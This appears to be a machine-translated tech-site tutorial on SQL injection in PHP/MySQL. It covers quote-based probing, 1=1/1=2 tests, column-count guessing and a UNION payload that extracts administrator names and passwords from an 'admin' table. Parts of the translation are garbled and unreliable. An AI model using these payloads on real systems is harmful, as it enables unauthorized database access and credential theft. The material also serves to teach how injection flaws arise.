Shulou(Shulou.com)06/01 Report--

This article introduces the relevant knowledge of "Analysis of the causes of PHP and MYSQL injection". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

When the articleid variable is 123, let's assume what kind of code will run on the server?

1. SELECT * / * Select function reads information * /

2. FROM infotable / * from the products data table * /

3. When WHERE id='123';/* false condition meets the conditions * /

/ * XXXX*/ is a comment symbol that is automatically ignored by / * / and the middle part of the computer when the program is running.

The code executed by the actual system looks like this:

1. Select * from infotable where id = '123'

Here, the value of id is to get the worthwhile "123" through url, so what if I do this:

Info.php?articleid=123'

Follow by a single quotation mark, so compare the changes in the statements that the system originally executed:

1. Select * from infotable where id = 123

2. Select * from infotable where id = 123'

* there is an extra quotation mark and a syntax error.

Note: computer programming can not get the desired results, there are two kinds of errors, one is syntax error, the other is logic error. After reading carefully, you will gradually understand the difference, which is why it is necessary to put single quotation marks after the URL to determine whether it is an injection point. (the error of adding single quotation marks cannot determine that the URL is the injection point. It's just a step of judgment), so the purpose of the following 1 # 1 and 1 # 2 will be clear.

1. Select * from infotable where id = 123

2. Select * from infotable where id = 123 and 1 = 1 / in fact 1 is 1, so it should be

Return to the normal page

3. Select * from infotable where id = 123 and 1 = 2 role / in fact, 1 is never equal to 2 in the computer, and a logic error occurs, so the error page is returned. Manual injection usually uses the federated query function union. Here's how to use union.

The * * step of union injection is usually a guess of the number of fields. Assuming that the injection point is the news page, the SQL statement executed in the page is:

1. Select title,date,author,news,comm from news where id = 12

When you do union injection, the statement in front of union and the statement after union is a complete SQL.

Statement, which can be executed separately

However, you must make sure that the number of fields before and after them is the same, such as the above statement

1. Select title,date,author,news,comm from news where id = 12

2. Select title,date,author,news,comm from news where id = 12 union select

Name,password,3,4,5 from admin

3. / / news is the news table segment, and admin is the administrator information table segment

4. / / the administrator information table section obviously does not contain as many fields as the news table section in front of union, so use the number 3 to 5 instead, the number has no fixed format, can make 1 / 2 and 3, can also be 111111 and 4435435, or simply replace it with null empty.

So, the above injection statement is actually constructed like this:

1. Info.php?id=12+union+select+name,password,3,4,5+from+admin

2. / / in SQL injection, the plus sign is used to represent spaces, because some browsers automatically convert spaces to% 20.

If there are five in front of the union and not five after the union, a logic error occurs and an error page is displayed.

Since we don't know how many fields the programmer has set in the database, we usually guess the number of fields first, that is:

1. Info.php?id=12+union+select+1

2. Info.php?id=12+union+select+1,2

3. Info.php?id=12+union+select+1,2,3

4. Info.php?id=12+union+select+1,2,3,4

5. Info.php?id=12+union+select+1,2,3,4,5

6. / / you can also use order by to guess, and you can search the usage yourself.

Keep guessing the correct page like this, without logic errors, it means that the number of fields is the same, and then. In the back.

This is just an idea.

This is the end of the content of "analyzing the causes of PHP and MYSQL injection". Thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.